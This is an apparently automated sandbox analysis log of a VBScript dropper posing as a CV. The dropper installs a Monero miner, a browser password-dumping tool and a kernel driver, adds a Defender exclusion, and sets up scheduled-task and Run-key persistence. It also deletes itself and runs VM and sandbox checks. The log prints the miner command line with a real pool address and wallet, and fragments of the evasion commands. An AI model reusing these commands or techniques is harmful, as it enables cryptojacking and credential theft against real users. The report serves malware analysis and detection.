Source: C:\Windows\System32\wscript.exe Process created: C:\Users\Public\WindowsUpdate\mservice.exe "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Users\Public\7g.exe Code function: 11_2_003C2962 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 11_2_003C2962
Source: C:\Users\Public\7g.exe Code function: 11_2_003B8FE9 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 11_2_003B8FE9
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select name from Win32_process where name like 'mservice.exe'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select name from Win32_process where name like 'mservice.exe'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select name from Win32_process where name like 'mservice.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fhh2tk2.a5a.ps1 Jump to behavior
Source: C:\Users\Public\7g.exe Code function: 11_2_003B8F28 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW, 11_2_003B8F28
Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5272:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4384:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3536:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_01
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: .pdbo` source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, go.exe.11.dr
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("wscript.exe", ""C:\Users\user\Desktop\curriculum_v", "", "runas", "1");
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: CreateTextFile("C:\Users\Public\computer_7", "true");IFileSystem3.FileExists("C:\Users\Public\computer_7");IFileSystem3.FileExists("C:\Users\Public\computer_7");IFileSystem3.OpenTextFile("C:\Users\Public\mutex", "2", "true");IShellDispatch6.ShellExecute("cmd.exe", "/c powershell -C "Add-MpPreference -Exc", "", "runas", "0");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");I
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\7g.exe Code function: 11_2_0041F1B0 push eax; ret 11_2_0041F1CE
Source: C:\Users\Public\7g.exe Code function: 11_2_0041F530 push eax; ret 11_2_0041F55E
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\7g.exe Code function: 11_2_003EA7A4 GetCurrentProcess,GetProcessTimes,fputs,memset,GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,__aulldiv,fputs,fputs,__aulldiv,__aulldiv,fputs, 11_2_003EA7A4
PE file contains sections with non-standard names
Source: 7zr[1].exe.5.dr Static PE information: section name: .sxdata
Source: 7g.exe.5.dr Static PE information: section name: .sxdata
Source: mservice.exe.11.dr Static PE information: section name: _RANDOMX
Source: mservice.exe.11.dr Static PE information: section name: _TEXT_CN
Source: mservice.exe.11.dr Static PE information: section name: _TEXT_CN
Source: mservice.exe.11.dr Static PE information: section name: _RDATA
PE file contains an invalid checksum
Source: go.exe.11.dr Static PE information: real checksum: 0x0 should be: 0x3e524
Source: 7zr[1].exe.5.dr Static PE information: real checksum: 0x0 should be: 0x9a24c
Source: mservice.exe.11.dr Static PE information: real checksum: 0x496ae1 should be: 0x48da3c
Source: 7g.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x9a24c
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior
barindex
Sample is not signed and drops a device driver
Source: C:\Users\Public\7g.exe File created: C:\Users\Public\WindowsUpdate\WinRing0x64.sys Jump to behavior
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\7zr[1].exe Jump to dropped file
Source: C:\Users\Public\7g.exe File created: C:\Users\Public\WindowsUpdate\mservice.exe Jump to dropped file
Source: C:\Users\Public\7g.exe File created: C:\Users\Public\WindowsUpdate\WinRing0x64.sys Jump to dropped file
Source: C:\Users\Public\7g.exe File created: C:\Users\Public\WindowsUpdate\ps.exe Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\Public\7g.exe Jump to dropped file
Source: C:\Users\Public\7g.exe File created: C:\Users\Public\WindowsUpdate\go.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\System32\wscript.exe File created: C:\Users\Public\7g.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"
Drops PE files to the user root directory
Source: C:\Windows\System32\wscript.exe File created: C:\Users\Public\7g.exe Jump to dropped file
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Media Service Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Media Service Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\curriculum_vitae-copie.vbs Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\WindowsUpdate\mservice.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\Public\WindowsUpdate\mservice.exe System information queried: FirmwareTableInformation Jump to behavior
Queries sensitive share information (via WMI, WIN32_SHARE, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Potential evasive VBS script found (sleep loop)
Source: C:\Users\Public\7g.exe Dropped file: Do Until .NameSpace(zipFile).Items.Count = _ WScript.Sleep 1000 Jump to dropped file
Source: C:\Users\Public\7g.exe Dropped file: do while 1 wscript.sleep(10000) Jump to dropped file
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
Queries sensitive share information (via WMI, Win32_Share, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
